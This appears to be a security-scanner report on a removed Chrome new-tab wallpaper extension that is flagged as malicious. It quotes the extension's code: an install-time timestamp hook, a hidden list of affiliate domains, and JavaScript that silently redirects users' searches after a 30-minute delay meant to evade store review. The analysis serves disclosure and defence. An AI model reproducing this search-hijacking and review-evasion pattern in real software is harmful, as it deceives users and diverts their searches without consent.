Iron Man Wallpapers Custom Tab

ID: eldglaapjapnpcbhpfplhcnecmgjfied

Could be malicious

Supported Languages

๐Ÿ‡ง๐Ÿ‡ฉBengali
๐Ÿ‡ง๐Ÿ‡ทBrazilian Portuguese
๐Ÿ‡ง๐Ÿ‡ฌBulgarian
๐Ÿ‡ช๐Ÿ‡ธCatalan
๐Ÿ‡จ๐Ÿ‡ณChinese (Simplified)
๐Ÿ‡น๐Ÿ‡ผChinese (Traditional)
๐Ÿ‡ญ๐Ÿ‡ทCroatian
๐Ÿ‡จ๐Ÿ‡ฟCzech
๐Ÿ‡ฉ๐Ÿ‡ฐDanish
๐Ÿ‡ณ๐Ÿ‡ฑDutch
๐Ÿ‡บ๐Ÿ‡ธEnglish
๐Ÿ‡ช๐Ÿ‡ชEstonian
๐Ÿ‡ต๐Ÿ‡ญFilipino
๐Ÿ‡ซ๐Ÿ‡ฎFinnish
๐Ÿ‡ซ๐Ÿ‡ทFrench
๐Ÿ‡ฉ๐Ÿ‡ชGerman
๐Ÿ‡ฎ๐Ÿ‡ณHindi
๐Ÿ‡ญ๐Ÿ‡บHungarian
๐Ÿ‡ฎ๐Ÿ‡ฉIndonesian
๐Ÿ‡ฎ๐Ÿ‡นItalian
๐Ÿ‡ฏ๐Ÿ‡ตJapanese
๐Ÿ‡ฐ๐Ÿ‡ทKorean
๐Ÿ‡ฑ๐Ÿ‡ปLatvian
๐Ÿ‡ฑ๐Ÿ‡นLithuanian
๐Ÿ‡ฒ๐Ÿ‡พMalay
๐Ÿ‡ฎ๐Ÿ‡ณMalayalam
๐Ÿ‡ณ๐Ÿ‡ดNorwegian
๐Ÿ‡ต๐Ÿ‡ฑPolish
๐Ÿ‡ต๐Ÿ‡นPortuguese
๐Ÿ‡ท๐Ÿ‡ดRomanian
๐Ÿ‡ท๐Ÿ‡บRussian
๐Ÿ‡ท๐Ÿ‡ธSerbian
๐Ÿ‡ธ๐Ÿ‡ฐSlovak
๐Ÿ‡ธ๐Ÿ‡ฎSlovenian
๐Ÿ‡ช๐Ÿ‡ธSpanish
๐Ÿ‡ฎ๐Ÿ‡ณTamil
๐Ÿ‡น๐Ÿ‡ญThai
๐Ÿ‡น๐Ÿ‡ทTurkish
๐Ÿ‡บ๐Ÿ‡ฆUkrainian
๐Ÿ‡ป๐Ÿ‡ณVietnamese

Extension Info & Metadata

Status
Removed
Version
0.3.85
Size
1.46 MB
Rating
0.0/5
Reviews
0
Users
10,000
Type
Extension
Updated
Apr 7, 2022
Category
38_search-tools
Price
Free
Featured
No
Visibility
Listed
Mature
No
By Google
No
Trusted
No

Publisher Contextual Analysis

Author
chromenewtab.comView Profile
MX records exist
Yes
Domain exists
Yes
Is disposable
No
Is role-based
No
Mailbox exists
Yes
Total Extensions
256
Active
0
Obsolete
256
Listed
256
Unlisted
0
Total Users
2,134,841

Give your browser a new look with Iron Man backgrounds

Hello guys Thank you for uploading the chrome new tab Extensions that we designed for Iron Man with great images. Thanks to Iron Man Extensions, great visuals will accompany you in every new tab you open and will allow you to have a pleasant time. Iron Man wallpaper features โšฝ๏ธ quality visuals in every new tab you open โšฝ๏ธ search bar in the middle of the page โšฝ๏ธ Date and time in the lower right corner โšฝ๏ธ Shortcut icons of popular sites in the middle of the page โšฝ๏ธ Popular games icon for you to play 500+ games for free โšฝ๏ธ You can use Iron Man background images mixed or fixed You can share our Iron Man application with your friends and family so that they can have a good time too. You can rate us as Stars and write a comment on the Chrome Store.

Item
Type
Severity
Description
storage
Permission
Medium
This permission allows storing data locally in the browser. Rated Medium because it can persist sensitive user data, track user activities over time, and potentially store malicious payloads.

After 1800 seconds (30 minutes) from installation, the search form's action URL is silently replaced with a randomly chosen third-party domain from the list 'addilos,addiyos,gundil'. All subsequent user searches are then submitted to one of these affiliate/tracking search redirectors instead of Google. The 30-minute delay is a deliberate anti-detection measure: during Chrome Web Store review (which happens shortly after submission) the extension behaves normally, but real users get their searches hijacked.

fTcVhU/zDgoY4.js (Line 8914)
$(window)  .on('load', function() {      chrome.storage.local.get(['inti'], function(resultinti) {        if (Math.floor(Date.now() / 1000) - resultinti.inti > 1800) {          var sp = $("#sf")            .data("sp")            .split(",");          var spr = sp[Math.floor(Math.random() * sp.length)];          $('#sf')            .attr('action', 'https://www.' + spr + '.com/index.html');        }      });

The search form embeds a hidden configuration payload in its data-sp attribute: 'addilos,addiyos,gundil'. These are known affiliate search redirect domains. The form initially targets Google to appear legitimate, but the JavaScript uses this data attribute as its list of hijack targets once the time-delay evasion window passes.

qrAgoJ.html (Line 221)
< form id="sf" target="_top" action="https://www.google.com/search" method="get" class="search-form" data -  sp="addilos,addiyos,gundil">

On first install, the service worker records the exact Unix timestamp into local storage under the key 'inti'. This value is later read by the new tab page JS to determine when 30 minutes have elapsed, at which point the search engine hijacking activates. Recording install time serves no legitimate user-facing feature; its sole purpose is to implement the time-delayed evasion logic.

fTcVhU/RfMwvTY.js (Line 5)
chrome.runtime.onInstalled.addListener(function(details) {      if (details.reason == "install") {        ...        chrome.storage.local.set({          inti: Math.floor(Date.now() / 1000)        }, function() {});

By severity

Critical1
High2
Medium0
Low0

Versions scanned

Showing 1 of 1 scanned version with more than one unique finding. Counts are unique findings that include each version.

Extension VersionCode Review Findings
0.3.853

Files with findings

3 distinct paths โ€” top paths by unique finding count:

  • fTcVhU/RfMwvTY.js1
  • fTcVhU/zDgoY4.js1
  • qrAgoJ.html1
S.No.
Category
Severity
File
Summary
Found in Version
1Tracking
critical
fTcVhU/zDgoY4.js (line 8914)After 1800 seconds (30 minutes) from installation, the search form's action URL is silently replaced with a randomly chosen third-party domain from the list 'addilos,addiyos,gundil'. All subsequent user searches are tโ€ฆ
2Tracking
high
qrAgoJ.html (line 221)The search form embeds a hidden configuration payload in its data-sp attribute: 'addilos,addiyos,gundil'. These are known affiliate search redirect domains. The form initially targets Google to appear legitimate, but โ€ฆ
3Tracking
high
fTcVhU/RfMwvTY.js (line 5)On first install, the service worker records the exact Unix timestamp into local storage under the key 'inti'. This value is later read by the new tab page JS to determine when 30 minutes have elapsed, at which point โ€ฆ
URLs
49
IPv4
0
IPv6
0

URLs

View the external URLs this extension communicates with to understand its network activity and data interactions.

Gain full insight into all external connections.

Upgrade for full visibility.

getbootstrap.com-https://getbootstrap.com/
github.com/twbs/bootstrap/blob/main/LICENSEhttps://github.com/twbs/bootstrap/blob/main/LICENSE
www.w3.org/2000/svghttp://www.w3.org/2000/svg
jqueryui.com-http://jqueryui.com
jqueryui.com/themeroller/http://jqueryui.com/themeroller/?bgShadowXPos=&bgOverlayXPos=&bgErrorXPos=&bgHighlightXPos=&bgContentXPos=&bgHeaderXPos=&bgActiveXPos=&bgHoverXPos=&bgDefaultXPos=&bgShadowYPos=&bgOverlayYPos=&bgErrorYPos=&bgHighlightYPos=&bgContentYPos=&bgHeaderYPos=&bgActiveYPos=&bgHoverYPos=&bgDefaultYPos=&bgShadowRepeat=&bgOverlayRepeat=&bgErrorRepeat=&bgHighlightRepeat=&bgContentRepeat=&bgHeaderRepeat=&bgActiveRepeat=&bgHoverRepeat=&bgDefaultRepeat=&iconsHover=url(%22images%2Fui-icons_555555_256x240.png%22
ns.adobe.com/xap/1.0/http://ns.adobe.com/xap/1.0/
www.w3.org/1999/02/22-rdf-syntax-nshttp://www.w3.org/1999/02/22-rdf-syntax-ns#
ns.adobe.com/xap/1.0/http://ns.adobe.com/xap/1.0/
ns.adobe.com/xap/1.0/mm/http://ns.adobe.com/xap/1.0/mm/
ns.adobe.com/xap/1.0/sType/ResourceRefhttp://ns.adobe.com/xap/1.0/sType/ResourceRef#
Showing 1 to 10 of 50 rows
Rows per page:

Gain full insight into all external connections.

Upgrade for full visibility.

No IP addresses found
Version
Size
Is Malicious
Findings
Permhash
0.3.85
Latest
1.46 MB
Malicious
3
Showing 1 to 1 of 10 rows
Rows per page:

Browse and explore files within this extension package

Gain full insight into all external connections.

Upgrade for full visibility.